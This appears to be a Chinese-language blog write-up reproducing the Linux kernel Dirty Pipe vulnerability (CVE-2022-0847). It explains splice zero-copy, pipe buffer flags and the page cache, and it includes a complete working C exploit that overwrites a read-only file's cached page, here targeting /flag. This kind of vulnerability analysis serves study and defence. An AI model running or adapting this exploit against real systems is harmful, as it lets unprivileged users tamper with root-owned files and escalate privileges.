CVE-2022-0847 Dirty Pipe

前言

持续性摆烂一段时间了，又想看jyy的课，又要期末考试了，好烦！索性花点时间把Gyan神上半年叫我复现的CVE复现了。

这个CVE允许向任意可读文件中写数据，可造成非特权进程向root进程注入代码。该漏洞发生linux内核空间通过splice方式实现数据拷贝时，以”零拷贝”的形式将文件发送到pipe，并且没有初始化pipe缓存页管理数据结构的flag成员。

零拷贝

首先需要了解一下零拷贝的概念，在普通的文件传输过程是如下图所示，可以看到这里进行了四次上下文切换，导致不必要的浪费和开销

所以linux内核出现了解决办法就是可以快速高效地将数据从文件系统移动到网络接口，而不需要将其从内核空间复制到用户空间，而这也就是所谓的零拷贝，在linux内核中有splice方式来解决。

这个系统调用不仅支持网络层面的传输，如果用户拥有两个已经打开的文件描述符可以任意文件相互连接，而不仅限于socket。

pipe原理

pipe在前面的利用中也使用到过，不过大多是利用它申请的结构体的堆块劫持ops或者泄漏，这里主要是使用他初始化会带来的内容。

首先我们清楚pipe会创建两个文件描述符，一个是输入另一个输出。在内核中pipe缓冲区的总长度是65536字节，一共16页，这里页与页之间不连续是通过数组进行管理的，维护的是一个类似于链表的结构。以前就提到过，pipe在内核中是下图这样的表现形式：

有pipe_buffer结构体只想page，而pipe_buffer结构体在往期kernel中有详细介绍，这里就不再赘述了。

static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
	struct file *filp = iocb->ki_filp;
	struct pipe_inode_info *pipe = filp->private_data;
	unsigned int head;
	ssize_t ret = 0;
	size_t total_len = iov_iter_count(from);
	ssize_t chars;
	bool was_empty = false;
	bool wake_next_writer = false;

	/* Null write succeeds. */
	if (unlikely(total_len == 0))
		return 0;

	__pipe_lock(pipe);

	if (!pipe->readers) {
		send_sig(SIGPIPE, current, 0);
		ret = -EPIPE;
		goto out;
	}

#ifdef CONFIG_WATCH_QUEUE
	if (pipe->watch_queue) {
		ret = -EXDEV;
		goto out;
	}
#endif

	/*
	 * Only wake up if the pipe started out empty, since
	 * otherwise there should be no readers waiting.
	 *
	 * If it wasn't empty we try to merge new data into
	 * the last buffer.
	 *
	 * That naturally merges small writes, but it also
	 * page-aligs the rest of the writes for large writes
	 * spanning multiple pages.
	 */
	head = pipe->head;
	was_empty = pipe_empty(head, pipe->tail);
	chars = total_len & (PAGE_SIZE-1);
	if (chars && !was_empty) {
		unsigned int mask = pipe->ring_size - 1;
		struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
		int offset = buf->offset + buf->len;

		if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
		    offset + chars <= PAGE_SIZE) {
			ret = pipe_buf_confirm(pipe, buf);
			if (ret)
				goto out;

			ret = copy_page_from_iter(buf->page, offset, chars, from);
			if (unlikely(ret < chars)) {
				ret = -EFAULT;
				goto out;
			}

			buf->len += ret;
			if (!iov_iter_count(from))
				goto out;
		}
	}

	for (;;) {
		if (!pipe->readers) {
			send_sig(SIGPIPE, current, 0);
			if (!ret)
				ret = -EPIPE;
			break;
		}

		head = pipe->head;
		if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
			unsigned int mask = pipe->ring_size - 1;
			struct pipe_buffer *buf = &pipe->bufs[head & mask];
			struct page *page = pipe->tmp_page;
			int copied;

			if (!page) {
				page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
				if (unlikely(!page)) {
					ret = ret ? : -ENOMEM;
					break;
				}
				pipe->tmp_page = page;
			}

			/* Allocate a slot in the ring in advance and attach an
			 * empty buffer.  If we fault or otherwise fail to use
			 * it, either the reader will consume it or it'll still
			 * be there for the next write.
			 */
			spin_lock_irq(&pipe->rd_wait.lock);

			head = pipe->head;
			if (pipe_full(head, pipe->tail, pipe->max_usage)) {
				spin_unlock_irq(&pipe->rd_wait.lock);
				continue;
			}

			pipe->head = head + 1;
			spin_unlock_irq(&pipe->rd_wait.lock);

			/* Insert it into the buffer array */
			buf = &pipe->bufs[head & mask];
			buf->page = page;
			buf->ops = &anon_pipe_buf_ops;
			buf->offset = 0;
			buf->len = 0;
			if (is_packetized(filp))
				buf->flags = PIPE_BUF_FLAG_PACKET;
			else
				buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
			pipe->tmp_page = NULL;

			copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
			if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
				if (!ret)
					ret = -EFAULT;
				break;
			}
			ret += copied;
			buf->offset = 0;
			buf->len = copied;

			if (!iov_iter_count(from))
				break;
		}

		if (!pipe_full(head, pipe->tail, pipe->max_usage))
			continue;

		/* Wait for buffer space to become available. */
		if (filp->f_flags & O_NONBLOCK) {
			if (!ret)
				ret = -EAGAIN;
			break;
		}
		if (signal_pending(current)) {
			if (!ret)
				ret = -ERESTARTSYS;
			break;
		}

		/*
		 * We're going to release the pipe lock and wait for more
		 * space. We wake up any readers if necessary, and then
		 * after waiting we need to re-check whether the pipe
		 * become empty while we dropped the lock.
		 */
		__pipe_unlock(pipe);
		if (was_empty) {
			wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
			kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
		}
		wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe));
		__pipe_lock(pipe);
		was_empty = pipe_empty(pipe->head, pipe->tail);
		wake_next_writer = true;
	}
out:
	......
}

可以看到在上半部分的会验证待输入的内容和当前页内已输入的内容长度是否超过PAGE_SIZE，然后验证buf->flags & PIPE_BUF_FLAG_CAN_MERGE如果通过则会进行copy操作。

如果未通过上半部分的验证则不会进入out，则会进入下方的for循环内，下面会新生成一个page，并且初始化buf

注意：这里默认的buf->flag = PIPE_BUF_FLAG_CAN_MERGE

漏洞分析

linux 内核page cache机制

linux 通过将打开的文件放到缓存页之中，缓存页被使用过后也会保存一段时间避免不必要的IO操作。短时间内访问同一个文件，都会操作相同的文件缓存页，而不是反复打开。而我们通过该方法篡改了这个文件缓存页，则短时间内访问(读取)该文件的操作都会读到被我们篡改的文件缓存页上，完成利用。

漏洞原理

splice 的零拷贝方法就是，直接用文件缓存页来替换pipe 中的缓存页(更改pipe缓存页指针指向文件缓存页)

这里漏洞出现在:

static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
			 struct iov_iter *i)
{
	struct pipe_inode_info *pipe = i->pipe;
	struct pipe_buffer *buf;
	unsigned int p_tail = pipe->tail;
	unsigned int p_mask = pipe->ring_size - 1;
	unsigned int i_head = i->head;
	size_t off;

	if (unlikely(bytes > i->count))
		bytes = i->count;

	if (unlikely(!bytes))
		return 0;

	if (!sanity(i))
		return 0;

	off = i->iov_offset;
	buf = &pipe->bufs[i_head & p_mask];
	if (off) {
		if (offset == off && buf->page == page) {
			/* merge with the last one */
			buf->len += bytes;
			i->iov_offset += bytes;
			goto out;
		}
		i_head++;
		buf = &pipe->bufs[i_head & p_mask];
	}
	if (pipe_full(i_head, p_tail, pipe->max_usage))
		return 0;

	buf->ops = &page_cache_pipe_buf_ops;
	get_page(page);
	buf->page = page;
	buf->offset = offset;
	buf->len = bytes;

	pipe->head = i_head + 1;
	i->iov_offset = offset + bytes;
	i->head = i_head;
out:
	i->count -= bytes;
	return bytes;
}

可以看到这里在最后是将page直接赋值给了buf，并且未初始化flag。如果我们修改page为目标文件，并且没有修改flag，那么我们可以直接使用pipe_write进行写。

利用思路

首先生成管道，并使用write填满所有管道 (下面截图中第一个结构体为pipe_inode_info)

随后read出所有pipe，head和tail相等，清空pipe

通过splice修改pipe->bufs->page指向文件缓存页
最后通过pipe_write写入内容

综上，得出exp

#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <stdint.h>
#include <sys/mman.h>
#include <signal.h>
#include <sys/prctl.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

int main()
{
    int p[2];
    int count;
    char buffer[4096];
    loff_t offset = 1;
    char data[] = "196082";
    int data_size = 6;

    int fd = open("/flag", O_RDONLY);
    if (fd < 0)
    {
        printf("[-] open failed!\n");
        exit(-1);
    }

    if (pipe(p))
        abort();

    for (int i = 0; i < 16; i++)
    {
        write(p[1], buffer, sizeof(buffer));
    }

    for (int i = 0; i < 16; i++)
    {
        read(p[0], buffer, sizeof(buffer));
    }

    ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
    if (nbytes < 0)
    {
        printf("[-] splice failed!\n");
        exit(-1);
    }
    if (nbytes == 0)
    {
        printf("[-] short splice!\n");
        exit(-1);
    }
    nbytes = write(p[1], data, data_size);
    if (nbytes < 0)
    {
        printf("[-] write failed!\n");
        exit(-1);
    }
    if (nbytes == 0)
    {
        printf("[-] short write!\n");
        exit(-1);
    }

    printf("success!\n");

    return 0;
}

总的来说，这个CVE的利用不算是很难，后续我会将复现环境都打包到github上

参考链接:

https://mp.weixin.qq.com/s/6VhWBOzJ7uu80nzFxe5jpg

https://dirtypipe.cm4all.com/

打包链接:

https://github.com/196082/196082